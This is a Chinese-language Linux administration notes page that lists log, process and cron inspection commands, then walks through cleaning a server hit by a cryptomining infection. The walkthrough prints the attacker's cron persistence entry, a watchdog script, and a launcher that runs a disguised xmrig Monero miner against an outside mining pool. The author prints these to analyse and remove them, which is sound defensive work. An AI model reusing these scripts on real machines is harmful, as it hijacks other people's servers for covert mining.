常用操作

yum

yum repolist all

安装单机k8s

https://www.cnblogs.com/neutronman/p/8047547.html

服务器中招后排查

https://www.cnblogs.com/sparkdev/p/7694202.html

# 查看登录信息
vim /var/log/auth.log # 登录日志，可以查看到尝试登陆的用户名和ip等信息
last -f /var/log/btmp # 记录所有失败的登陆日志
last -u <userName>
last -f /var/log/wtmp # 登陆Ip，登陆时长

# 当前谁在线等信息
w
users

# 查看所有用户
vim /etc/passwd

history # 操作历史，登陆用户查看这个用户的操作历史

# 查看运行的进程
pstree -a # centos 用yum install psmisc
ps aux

# 查看网络情况
netstat -ntulp  
# ufw屏蔽ip
ufw deny from 192.168.1.5 to any

# CPU内存
free -m  
uptime  
top  
htop

# 还有空余的内存吗? 服务器是否正在内存和硬盘之间进行swap?
# 还有剩余的CPU吗? 服务器是几核的? 是否有某些CPU核负载过多了?
# 服务器最大的负载来自什么地方? 平均负载是多少?

for user in $(cat /etc/passwd | cut -f1 -d:); do crontab -l -u $user; done # 查看每个用户的定时任务


# 系统日志和内核消息
$ dmesg  
$ less /var/log/messages  
$ less /var/log/secure  
$ less /var/log/auth

在linux上发送http:POST请求
https://www.cnblogs.com/kaleidoscope/p/9719841.html

服务器负载太高，top命令查出异常进程ld-linux-x86_64，上网查果真有问题，

Tasks: 148 total,   2 running, 146 sleeping,   0 stopped,   0 zombie
%Cpu(s): 99.7 us,  0.3 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:  32949020 total, 12146052 used, 20802968 free,   188664 buffers
KiB Swap:  7812092 total,        0 used,  7812092 free.  1615040 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
30054 wocloud   20   0 9993904 8.809g   2632 S 333.0 28.0 102585:34 ld-linux-x86-64
   11 root      20   0       0      0      0 S   0.3  0.0   8:14.07 rcuos/3

# 扫描出有异常定时任务
* * * * * /dev/shm/.ssh/upd >/dev/null 2>&1

# 进入相应用户删除异常定时任务

# 进入可疑文件目录/dev/shm/.ssh
vim /dev/shm/.ssh/upd
#!/bin/sh
# 保持进程存在的脚本
if test -r /dev/shm/.ssh/bash.pid; then # 如果bash.pid文件存在且可读，
pid=$(cat /dev/shm/.ssh/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)# -CHLD？  >/dev/null 2>&1，将输出全部丢弃
then
sleep 1
else
cd /dev/shm/.ssh
./run &>/dev/null # 执行run脚本，并将输出丢弃
exit 0
fi
fi


#!/bin/bash
# 查看run脚本
#ps aux | grep -vw xmr-stak | awk '{if($3>40.0) print $2}' | while read procid
#do
#kill -9 $procid
#done
proc=`nproc`
ARCH=`uname -m`
HIDE="-bash"

if [ "$ARCH" == "i686" ];       then
        ./h32 -s $HIDE ./md32 -a cryptonight -o stratum+tcp://ip:3333 钱包地址 -p x >>/dev/null & # 此ip是一个马来西亚ip，3333端口也几乎证明安装了xmrig-proxy，可以确定就是挖矿的了
elif [ "$ARCH" == "x86_64" ];   then
        ./h64 -s $HIDE ./stak/ld-linux-x86-64.so.2 --library-path stak stak/xmrig >>/dev/null & # 执行ld-linux-x86-64进程，然而环境变量指向的是xmrig这个挖矿木马
fi
echo $! > bash.pid

# 主要就是这些脚本

# clamav查杀病毒
clamscan -r / --move=/tmp

----------- SCAN SUMMARY -----------
Known viruses: 6165915
Engine version: 0.100.3
Scanned directories: 14709
Scanned files: 43249
Infected files: 6
Total errors: 16439
Data scanned: 1287.82 MB
Data read: 1496.12 MB (ratio 0.86:1)
Time: 1143.508 sec (19 m 3 s)

root@ubuntu:~# ll /tmp/
ls: 初始化月份字符串出错
总用量 13904
drwxrwxrwt  2 root root    4096  7▒▒  4 16:07 ./
drwxr-xr-x 22 root root    4096  4▒▒ 24  2014 ../
-rw-------  1 root root  838583  7▒▒  4 15:57 h64
-rw-------  1 root root 2735648  7▒▒  4 15:57 libxmrstak_opencl_backend.so
-rwxr-xr-x  1 root root 2821872  3▒▒  9 06:12 x.001*
-rw-------  1 root root 5200240  7▒▒  4 15:57 xmrig
-rw-------  1 root root 2627088  7▒▒  4 15:57 xmrig-notls

# 同时，stak目录下也有config.json文件，是开源的门罗币挖矿木马的配置文件，可以明显的看到ip,port,钱包地址等信息，可以确定是一个简单的门罗币挖矿木马了

Tasks: 141 total,   4 running, 137 sleeping,   0 stopped,   0 zombie
%Cpu(s):  0.7 us, 11.8 sy,  0.0 ni, 87.3 id,  0.1 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:  32949020 total,   638652 used, 32310368 free,    42468 buffers
KiB Swap:  7812092 total,        0 used,  7812092 free.   165852 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
   86 root      39  19       0      0      0 R  45.5  0.0   0:04.32 khugepaged
 1314 clamav    20   0  269820 173048   7224 D  23.2  0.5   0:40.28 clamd

clamav使用

服务器防护

ssh防护

Previouslinux服务器 Nextlinux服务器

Last updated 6 years ago

Was this helpful?